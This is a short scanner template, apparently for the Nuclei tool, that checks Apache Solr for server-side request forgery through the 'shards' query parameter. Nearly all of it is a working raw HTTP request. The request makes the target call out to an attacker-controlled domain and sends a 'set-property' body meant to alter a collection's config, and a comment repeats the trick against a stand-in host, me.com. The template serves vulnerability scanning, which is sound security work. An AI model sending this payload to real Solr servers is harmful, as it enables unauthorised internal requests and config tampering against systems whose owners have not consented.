id: ApacheSolr-SSRF-1

info:
  name: Apache Solr SSRF
  author: 0xAwali
  severity: critical
  description: Apache Solr SSRF Via Shards Parameter , Commonly Bound Ports 8983
  #Add shards Parameter To Any Query e.g. q=search&shards=http://me.com OR q=search%26shards=http://me.com
  reference:
      - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#solr
      - https://github.com/veracode-research/solr-injection
      

requests:
  - raw:
      - |
        GET /search?q=Apple&shards=http://{{Host}}.{{Port}}.{{Hostname}}.apachesolr.{{MY-DOMAIN}}/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate